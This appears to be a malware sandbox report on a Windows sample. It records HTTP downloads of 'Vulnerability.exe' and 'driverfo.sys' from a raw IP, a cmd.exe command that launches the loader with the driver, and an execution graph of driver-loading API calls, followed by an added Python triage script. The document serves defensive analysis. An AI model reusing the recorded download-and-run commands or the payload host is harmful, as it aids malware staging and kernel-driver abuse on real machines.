Oct 25, 2024 08:10:24.381093979 CEST | 1.1.1.1 | 192.168.2.4 | 0x68e0 | No error (0) | keyauth.win |  | 104.26.0.5 | A (IP address) | IN (0x0001) | false
Oct 25, 2024 08:10:24.381093979 CEST | 1.1.1.1 | 192.168.2.4 | 0x68e0 | No error (0) | keyauth.win |  | 104.26.1.5 | A (IP address) | IN (0x0001) | false
Oct 25, 2024 08:10:24.381093979 CEST | 1.1.1.1 | 192.168.2.4 | 0x68e0 | No error (0) | keyauth.win |  | 172.67.72.57 | A (IP address) | IN (0x0001) | false
                                                                                        • 185.101.104.122
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 185.101.104.122 | 80 | 2256 | C:\Users\user\Desktop\lUAc7lqa56.exe
Timestamp | Bytes transferred | Direction | Data
Oct 25, 2024 08:10:11.584738970 CEST | 311 | OUT | GET /Vulnerability.exe HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 185.101.104.122
Connection: Keep-Alive
Oct 25, 2024 08:10:12.274135113 CEST | 1236 | IN | HTTP/1.1 200 OK
Date: Fri, 25 Oct 2024 06:10:12 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Last-Modified: Thu, 03 Oct 2024 17:41:18 GMT
ETag: "23800-623960fde9891"
Accept-Ranges: bytes
Content-Length: 145408
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
Oct 25, 2024 08:10:12.672293901 CEST | 306 | OUT | GET /driverfo.sys HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 185.101.104.122
Connection: Keep-Alive
Oct 25, 2024 08:10:12.842415094 CEST | 1236 | IN | HTTP/1.1 200 OK
Date: Fri, 25 Oct 2024 06:10:12 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Last-Modified: Sat, 19 Oct 2024 00:07:08 GMT
ETag: "4d00-624c93353bec7"
Accept-Ranges: bytes
Content-Length: 19712
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive


Target ID: 0
Start time: 02:10:09
Start date: 25/10/2024
Path: C:\Users\user\Desktop\lUAc7lqa56.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\lUAc7lqa56.exe"
Imagebase: 0x7ff78ffa0000
File size: 6'062'592 bytes
MD5 hash: 4C428E14CF5FC2C5E54BA377389C8253
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

                                                                                        Target ID:1
                                                                                        Start time:02:10:09
                                                                                        Start date:25/10/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:2
                                                                                        Start time:02:10:13
                                                                                        Start date:25/10/2024
                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\cmd.exe /c cd C:\
                                                                                        Imagebase:0x7ff6ebb00000
                                                                                        File size:289'792 bytes
                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:3
                                                                                        Start time:02:10:13
                                                                                        Start date:25/10/2024
                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\cmd.exe /c start C:\Windows\Vulnerability.exe C:\Windows\driverfo.sys
                                                                                        Imagebase:0x7ff6ebb00000
                                                                                        File size:289'792 bytes
                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:4
                                                                                        Start time:02:10:13
                                                                                        Start date:25/10/2024
                                                                                        Path:C:\Windows\Vulnerability.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\Vulnerability.exe C:\Windows\driverfo.sys
                                                                                        Imagebase:0x7ff7cc410000
                                                                                        File size:145'408 bytes
                                                                                        MD5 hash:8619AFEC8BD66B2C589FC987D7D0B194
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Antivirus matches:
                                                                                        • Detection: 100%, Avira
                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                        • Detection: 55%, ReversingLabs
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        Target ID:5
                                                                                        Start time:02:10:13
                                                                                        Start date:25/10/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:8
                                                                                        Start time:02:10:22
                                                                                        Start date:25/10/2024
                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\user\Desktop\lUAc7lqa56.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
                                                                                        Imagebase:0x7ff6ebb00000
                                                                                        File size:289'792 bytes
                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:9
                                                                                        Start time:02:10:22
                                                                                        Start date:25/10/2024
                                                                                        Path:C:\Windows\System32\certutil.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:certutil -hashfile "C:\Users\user\Desktop\lUAc7lqa56.exe" MD5
                                                                                        Imagebase:0x7ff73ee30000
                                                                                        File size:1'651'712 bytes
                                                                                        MD5 hash:F17616EC0522FC5633151F7CAA278CAA
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:10
                                                                                        Start time:02:10:22
                                                                                        Start date:25/10/2024
                                                                                        Path:C:\Windows\System32\find.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:find /i /v "md5"
                                                                                        Imagebase:0x7ff6169c0000
                                                                                        File size:17'920 bytes
                                                                                        MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:11
                                                                                        Start time:02:10:22
                                                                                        Start date:25/10/2024
                                                                                        Path:C:\Windows\System32\find.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:find /i /v "certutil"
                                                                                        Imagebase:0x7ff6169c0000
                                                                                        File size:17'920 bytes
                                                                                        MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:13
                                                                                        Start time:02:10:24
                                                                                        Start date:25/10/2024
                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\cmd.exe /c start cmd /C "color b && title Error && echo SSL connect error && timeout /t 5"
                                                                                        Imagebase:0x7ff6ebb00000
                                                                                        File size:289'792 bytes
                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:14
                                                                                        Start time:02:10:24
                                                                                        Start date:25/10/2024
                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:cmd /C "color b && title Error && echo SSL connect error && timeout /t 5"
                                                                                        Imagebase:0x7ff6ebb00000
                                                                                        File size:289'792 bytes
                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:15
                                                                                        Start time:02:10:24
                                                                                        Start date:25/10/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:17
                                                                                        Start time:02:10:24
                                                                                        Start date:25/10/2024
                                                                                        Path:C:\Windows\System32\WerFault.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\WerFault.exe -pss -s 460 -p 2256 -ip 2256
                                                                                        Imagebase:0x7ff6ca8e0000
                                                                                        File size:570'736 bytes
                                                                                        MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:18
                                                                                        Start time:02:10:24
                                                                                        Start date:25/10/2024
                                                                                        Path:C:\Windows\System32\timeout.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:timeout /t 5
                                                                                        Imagebase:0x7ff679060000
                                                                                        File size:32'768 bytes
                                                                                        MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:19
                                                                                        Start time:02:10:25
                                                                                        Start date:25/10/2024
                                                                                        Path:C:\Windows\System32\WerFault.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\WerFault.exe -u -p 2256 -s 1288
                                                                                        Imagebase:0x7ff6ca8e0000
                                                                                        File size:570'736 bytes
                                                                                        MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true
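The process list above records the full behaviour chain of the sample: cmd.exe starts C:\Windows\Vulnerability.exe with C:\Windows\driverfo.sys as its argument (a loader for the dropped driver), certutil computes the MD5 of the sample itself with the output filtered through two find commands, a second cmd window prints a scripted "SSL connect error" and waits five seconds, and WerFault attaches to PID 2256 after a crash. The script below is an added example for this page, not Joe Sandbox code and not part of the sample; it parses records in the report's "Key:Value" layout and flags those behaviours. The record text is constructed from the report's own entries (Target IDs 3, 4, 9, 14 and 17), and reading the certutil call as a self-integrity check is an inference, not something the report states.

```python
"""Triage helper for a Joe Sandbox-style process list (added example, not Joe Sandbox code)."""
import re
from dataclasses import dataclass, field

# Constructed from the process entries in the report above (Target IDs 3, 4, 9, 14, 17).
SAMPLE_RECORDS = r"""
Target ID:3
Path:C:\Windows\System32\cmd.exe
Commandline:C:\Windows\system32\cmd.exe /c start C:\Windows\Vulnerability.exe C:\Windows\driverfo.sys

Target ID:4
Path:C:\Windows\Vulnerability.exe
Commandline:C:\Windows\Vulnerability.exe C:\Windows\driverfo.sys

Target ID:9
Path:C:\Windows\System32\certutil.exe
Commandline:certutil -hashfile "C:\Users\user\Desktop\lUAc7lqa56.exe" MD5

Target ID:14
Path:C:\Windows\System32\cmd.exe
Commandline:cmd /C "color b && title Error && echo SSL connect error && timeout /t 5"

Target ID:17
Path:C:\Windows\System32\WerFault.exe
Commandline:C:\Windows\system32\WerFault.exe -pss -s 460 -p 2256 -ip 2256
"""

# An executable sitting directly in C:\Windows (not System32/SysWOW64) is unusual for
# legitimate software and matches the report's "drops executables to the windows directory".
WINDOWS_ROOT_EXE = re.compile(r"^c:\\windows\\[^\\]+\.exe$", re.IGNORECASE)
SYS_PATH = re.compile(r'[a-z]:\\[^\s"]+\.sys')


@dataclass
class Proc:
    target_id: int
    path: str
    cmdline: str
    findings: list = field(default_factory=list)


def parse_records(text):
    """Split the 'Key:Value' blocks (separated by blank lines) into Proc objects."""
    procs = []
    for block in re.split(r"\n\s*\n", text.strip()):
        kv = {}
        for line in block.splitlines():
            key, _, val = line.partition(":")  # first colon only; paths keep their drive letter
            kv[key.strip()] = val.strip()
        if "Target ID" in kv:
            procs.append(Proc(int(kv["Target ID"]), kv.get("Path", ""), kv.get("Commandline", "")))
    return procs


def staged_drivers(procs):
    """Every .sys path referenced on any command line (the driver the loader is handed)."""
    found = set()
    for p in procs:
        found.update(SYS_PATH.findall(p.cmdline.lower()))
    return found


def triage(procs, sample_path):
    """Return {target_id: [finding, ...]} for processes that match a behaviour of interest."""
    sample = sample_path.lower()
    for p in procs:
        low = p.cmdline.lower()
        if WINDOWS_ROOT_EXE.match(p.path) and ".sys" in low:
            p.findings.append("driver staging: executable in Windows root given a .sys argument")
        if "certutil" in low and "-hashfile" in low and sample in low:
            # Inference: the sample hashing its own image is typical of an anti-tamper check.
            p.findings.append("self-integrity check: certutil hashes the sample binary")
        if "echo" in low and "error" in low and "timeout /t" in low:
            p.findings.append("decoy console: scripted error message followed by timeout")
        m = re.search(r"werfault\.exe.*?-p\s+(\d+)", low)
        if m:
            p.findings.append(f"crash: WerFault attached to PID {m.group(1)}")
    return {p.target_id: p.findings for p in procs if p.findings}


if __name__ == "__main__":
    procs = parse_records(SAMPLE_RECORDS)
    print("drivers staged:", sorted(staged_drivers(procs)))
    for tid, findings in triage(procs, r"C:\Users\user\Desktop\lUAc7lqa56.exe").items():
        for f in findings:
            print(f"[{tid}] {f}")
```

The same parser runs unchanged over the complete list above once it is pasted into SAMPLE_RECORDS; the remaining cmd.exe, conhost.exe, find.exe and timeout.exe entries produce no findings, which is the point of filtering a noisy process tree down to the handful of command lines worth confirming on the host.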


                                                                                          Execution Graph

                                                                                          Execution Coverage:13.1%
                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                          Signature Coverage:36.8%
                                                                                          Total number of Nodes:1771
                                                                                          Total number of Limit Nodes:28
                                                                                          execution_graph 7572 7ff7cc423fe8 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 7444 7ff7cc425170 7445 7ff7cc425190 7444->7445 7446 7ff7cc425183 7444->7446 7448 7ff7cc419a50 7446->7448 7449 7ff7cc419a8f 7448->7449 7450 7ff7cc419a63 7448->7450 7449->7445 7451 7ff7cc419aa8 _invalid_parameter_noinfo_noreturn 7450->7451 7452 7ff7cc419a87 7450->7452 7453 7ff7cc423fe0 free 7452->7453 7453->7449 7454 7ff7cc420f70 7455 7ff7cc420f91 7454->7455 7460 7ff7cc420fc2 7454->7460 7458 7ff7cc4210ad _invalid_parameter_noinfo_noreturn 7455->7458 7459 7ff7cc423fe0 free 7455->7459 7456 7ff7cc421017 7457 7ff7cc421063 __std_exception_destroy 7456->7457 7456->7458 7464 7ff7cc42105b 7456->7464 7462 7ff7cc42109a 7457->7462 7463 7ff7cc42108d 7457->7463 7467 7ff7cc4210da 7458->7467 7470 7ff7cc42110b 7458->7470 7459->7460 7460->7456 7460->7458 7461 7ff7cc423fe0 free 7460->7461 7461->7456 7466 7ff7cc423fe0 free 7463->7466 7465 7ff7cc423fe0 free 7464->7465 7465->7457 7466->7462 7468 7ff7cc4211db _invalid_parameter_noinfo_noreturn __std_exception_copy 7467->7468 7469 7ff7cc423fe0 free 7467->7469 7475 7ff7cc42124c 7468->7475 7469->7470 7470->7468 7471 7ff7cc421160 7470->7471 7473 7ff7cc423fe0 free 7470->7473 7471->7468 7472 7ff7cc4211ac __std_exception_destroy 7471->7472 7474 7ff7cc423fe0 free 7471->7474 7472->7468 7473->7471 7474->7472 7476 7ff7cc419af0 22 API calls 7475->7476 7477 7ff7cc421268 7476->7477 7661 7ff7cc41f070 ?widen@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBADD ?put@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@D ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12 7727 7ff7cc4110f0 __std_exception_destroy 7728 7ff7cc411118 7727->7728 7729 7ff7cc411125 7727->7729 7730 7ff7cc423fe0 free 7728->7730 7730->7729 7481 7ff7cc41d760 7482 7ff7cc41d8c9 7481->7482 7483 7ff7cc41d790 7481->7483 7501 7ff7cc411230 ?_Xlength_error@std@@YAXPEBD 7482->7501 7485 
7ff7cc41d7eb 7483->7485 7487 7ff7cc41d817 7483->7487 7488 7ff7cc41d7de 7483->7488 7489 7ff7cc424108 std::_Facet_Register 3 API calls 7485->7489 7486 7ff7cc41d8ce 7491 7ff7cc411190 Concurrency::cancel_current_task __std_exception_copy 7486->7491 7490 7ff7cc41d800 7487->7490 7493 7ff7cc424108 std::_Facet_Register 3 API calls 7487->7493 7488->7485 7488->7486 7489->7490 7492 7ff7cc41d88e _invalid_parameter_noinfo_noreturn 7490->7492 7495 7ff7cc41d848 memmove memmove 7490->7495 7496 7ff7cc41d895 memmove memmove 7490->7496 7494 7ff7cc41d8d4 7491->7494 7492->7496 7493->7490 7497 7ff7cc41d86c 7495->7497 7498 7ff7cc41d881 7495->7498 7500 7ff7cc41d88c 7496->7500 7497->7492 7497->7498 7499 7ff7cc423fe0 free 7498->7499 7499->7500 7574 7ff7cc41a5e0 7575 7ff7cc41a629 7574->7575 7576 7ff7cc41a630 ?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA_N_N 7574->7576 7575->7576 7577 7ff7cc41a647 ?getloc@ios_base@std@@QEBA?AVlocale@2 7576->7577 7578 7ff7cc41a6da ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N 7576->7578 7587 7ff7cc41a2b0 ??0_Lockit@std@@QEAA@H ??Bid@locale@std@ 7577->7587 7581 7ff7cc41a79b 7578->7581 7584 7ff7cc41a6d0 7584->7578 7585 7ff7cc41cc00 8 API calls 7584->7585 7586 7ff7cc41a728 ?snextc@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 7584->7586 7585->7586 7586->7584 7588 7ff7cc41a312 7587->7588 7589 7ff7cc41a387 ??1_Lockit@std@@QEAA 7588->7589 7591 7ff7cc41a329 ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12 7588->7591 7592 7ff7cc41a335 7588->7592 7590 7ff7cc423fc0 8 API calls 7589->7590 7593 7ff7cc41a3a2 ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 7590->7593 7591->7592 7592->7589 7594 7ff7cc41a34c ?_Getcat@?$ctype@D@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@ 7592->7594 7593->7584 7595 7ff7cc41a3b7 7594->7595 7596 7ff7cc41a360 7594->7596 7598 7ff7cc411280 Concurrency::cancel_current_task 2 API calls 7595->7598 7597 7ff7cc423868 std::_Facet_Register 3 API calls 7596->7597 7599 7ff7cc41a372 7597->7599 7600 7ff7cc41a3bc 7598->7600 7599->7589 
Execution Graph (node and edge data of the interactive graph; the rendered graph is not reproduced here)

Each node in the exported data is a decimal id, a code address in the main image (0x7ff7cc411000 to 0x7ff7cc425fff), and the imports called at that node; edges are written id->id. "N API calls" marks a callee whose own calls the graph summarises rather than expands. Grouped by routine, the imports visible in the node annotations are:

Command-line handling (7ff7cc421630): SetUnhandledExceptionFilter, then a chain of _wcsicmp comparisons over the arguments obtained through __p___wargv/__p___argc, with results written to std::ostream.

Process lookup (7ff7cc421590, 7ff7cc4214c0): GetShellWindow, GetWindowThreadProcessId, GetCurrentProcessId, CreateToolhelp32Snapshot.

Symbol resolution via dbghelp (7ff7cc4145e0, 7ff7cc413ce0): LoadLibraryA (twice), _dupenv_s, GetFileAttributesExA, CreateFileA, GetCurrentProcessId, OpenProcess, SymInitialize, SymSetOptions, SymLoadModuleEx, SymFromName, SymUnloadModule64, SymCleanup, CloseHandle. The resolved result is followed by _time64, GetCurrentThreadId, srand, rand (7ff7cc4148d2).

File drop (7ff7cc4149b0): _wremove, then a std::ofstream is constructed and written with basic_ostream::write, after which the driver registration routine below is called.

Driver registration and load (7ff7cc422900): RegCreateKeyW, RegSetKeyValueW (twice), RegCloseKey, GetModuleHandleA, GetProcAddress (twice), RtlAdjustPrivilege, RtlInitUnicodeString, NtLoadDriver; error paths write the status to a std::ostream.

Device access (7ff7cc414ba5 onwards): CreateFileW, NtQuerySystemInformation (7ff7cc4232c0, inside a VirtualAlloc/VirtualFree retry loop with _stricmp matching of the returned entries), then DeviceIoControl (7ff7cc414d60).

std::filesystem status (7ff7cc423b60): GetFileAttributesExW, GetLastError, FindFirstFileW, FindClose, CreateFileW, GetFileInformationByHandleEx, CloseHandle, abort; __std_fs_convert_wide_to_narrow and WideCharToMultiByte appear in the path conversion helpers.

Error text formatting (7ff7cc420750): GetLocaleInfoEx, FormatMessageA, LocalFree, ?_Winerror_map@std@@ (std::system_error message construction).

CRT start-up and failure handling (7ff7cc424738, 7ff7cc4241bc, 7ff7cc424b58, 7ff7cc424d6c): __scrt_acquire_startup_lock, _initialize_onexit_table, _configthreadlocale, _initialize_wide_environment, InitializeSListHead, GetModuleHandleW, _register_thread_local_exe_atexit_callback, _cexit, _exit; GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter (security cookie initialisation); IsProcessorFeaturePresent, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter.

Caveat: the IsDebuggerPresent node (7ff7cc424c02) sits inside the routine starting at 7ff7cc424b58, whose sequence (RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, then IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter) is the MSVC CRT __scrt_fastfail fallback reached from the start-up path. That call is compiler runtime code and should not by itself be read as an anti-debugging check in the sample's own logic.

The remaining nodes are C runtime and C++ standard library internals: fgetc, ungetc, fread, fwrite, fputc, fflush, fclose, setvbuf, _fseeki64, fgetpos, fsetpos, _lock_file/_unlock_file, malloc, free, memmove, memset, memcmp, __stdio_common_vsprintf, ___lc_codepage_func, AreFileApisANSI, basic_streambuf/basic_istream/basic_ostream/basic_ios members, codecvt in/out, _Fiopen, _invalid_parameter_noinfo_noreturn, _Xlength_error, Concurrency::cancel_current_task, __std_exception_copy, _CxxThrowException, _seh_filter_exe.
?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W 5777->5780 5778->5776 5781 7ff7cc41a985 ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QEAAG_W 5778->5781 5779->5775 5780->5775 5780->5777 5781->5776 5781->5778 5783 7ff7cc417b5a 5782->5783 5784 7ff7cc417b30 5782->5784 5783->5784 5785 7ff7cc417b6c 5783->5785 5786 7ff7cc41a3c0 9 API calls 5784->5786 5787 7ff7cc417b74 memset 5785->5787 5788 7ff7cc417b43 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5786->5788 6211 7ff7cc415e00 5787->6211 5796 7ff7cc417c37 5788->5796 5791 7ff7cc423fc0 8 API calls 5792 7ff7cc417c47 5791->5792 5792->5311 5793 7ff7cc41a3c0 9 API calls 5794 7ff7cc417c1e ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5793->5794 5797 7ff7cc417c2f 5794->5797 5795 7ff7cc423fe0 free 5795->5796 5796->5791 5797->5795 6217 7ff7cc417c70 5798->6217 5801 7ff7cc417b00 22 API calls 5802 7ff7cc41731f 5801->5802 5803 7ff7cc417c70 21 API calls 5802->5803 5804 7ff7cc417341 5803->5804 5805 7ff7cc417b00 22 API calls 5804->5805 5806 7ff7cc417360 5805->5806 5807 7ff7cc41741a 5806->5807 5808 7ff7cc417c70 21 API calls 5806->5808 5809 7ff7cc41743a 5807->5809 5810 7ff7cc4173c7 5807->5810 5811 7ff7cc417395 5808->5811 5812 7ff7cc41a7c0 29 API calls 5809->5812 5816 7ff7cc41a3c0 9 API calls 5810->5816 5813 7ff7cc417b00 22 API calls 5811->5813 5814 7ff7cc417446 ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@P6AAEAVios_base@1@AEAV21@@Z ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@_K ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5812->5814 5815 7ff7cc4173b4 5813->5815 5817 7ff7cc41a7c0 29 API calls 5814->5817 5815->5810 5821 7ff7cc41a3c0 9 API calls 5815->5821 5818 7ff7cc4173d3 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5816->5818 5819 7ff7cc417489 ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@P6AAEAVios_base@1@AEAV21@@Z 
??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@_K ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5817->5819 5820 7ff7cc417acd 5818->5820 6231 7ff7cc416d90 5819->6231 5824 7ff7cc423fc0 8 API calls 5820->5824 5822 7ff7cc4173f6 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5821->5822 5822->5807 5826 7ff7cc414df4 5824->5826 5826->5293 5882 7ff7cc417ea0 5826->5882 5827 7ff7cc416d90 9 API calls 5828 7ff7cc4174e8 5827->5828 6237 7ff7cc416e90 5828->6237 5831 7ff7cc41a3c0 9 API calls 5832 7ff7cc417516 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5831->5832 5833 7ff7cc41752f 5832->5833 6257 7ff7cc4170e0 5833->6257 5835 7ff7cc41754e 5837 7ff7cc41a3c0 9 API calls 5835->5837 5836 7ff7cc417570 DeviceIoControl 5836->5835 5838 7ff7cc417546 5836->5838 5839 7ff7cc417a70 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5837->5839 5838->5835 5838->5836 5840 7ff7cc4175e8 5838->5840 5841 7ff7cc416fc0 50 API calls 5839->5841 5842 7ff7cc417600 DeviceIoControl 5840->5842 5843 7ff7cc417678 5840->5843 5847 7ff7cc417a88 5841->5847 5842->5835 5842->5840 5844 7ff7cc41a7c0 29 API calls 5843->5844 5845 7ff7cc41768b ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@P6AAEAVios_base@1@AEAV21@@Z ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV01@PEBX ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5844->5845 5848 7ff7cc4176d0 DeviceIoControl 5845->5848 5846 7ff7cc417ac8 5850 7ff7cc423fe0 free 5846->5850 5847->5820 5847->5846 5849 7ff7cc417ac1 _invalid_parameter_noinfo_noreturn 5847->5849 5848->5835 5851 7ff7cc417731 5848->5851 5849->5846 5850->5820 5851->5848 5852 7ff7cc417740 5851->5852 5853 7ff7cc417760 DeviceIoControl 5852->5853 5854 7ff7cc4177d0 5852->5854 5853->5835 5853->5852 5854->5835 5855 7ff7cc4178aa 5854->5855 6279 7ff7cc424090 AcquireSRWLockExclusive 5854->6279 5856 7ff7cc4178e3 5855->5856 5857 
